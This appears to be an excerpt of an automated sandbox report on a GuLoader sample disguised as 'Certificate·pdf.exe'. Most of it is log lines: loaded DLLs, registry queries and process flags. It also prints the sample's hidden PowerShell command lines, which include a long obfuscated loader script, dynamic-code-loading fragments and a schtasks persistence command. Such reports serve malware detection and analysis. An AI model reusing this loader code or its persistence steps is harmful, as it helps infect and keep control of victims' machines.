Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: profapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: Certificate#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: !x""f.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !indows\System.pdbpdbtem.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !em.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.24024306894.000000000C1E3000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((fkp $Complementing $rosiners4), (GDT @([Int32], [Int32], [Int32], [Int32], [Int32], [Int32]) ([Int32])))$Indfrselstolds = ([AppDomain]::CurrentDomain.GetAssemblies() \| W
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skrmarbejdes8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skrmarbejdes9, $false).DefineType($rosiners

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_04590F4A push 846A6749h; ret	5_2_04590F4F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_217B0E32 push 217B0FA4h; retn 0020h	5_2_217B0E3C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_217B0D8A push 217B0FA4h; retn 0024h	5_2_217B0D94
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD0973 push ss; ret	5_2_23BD0974

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
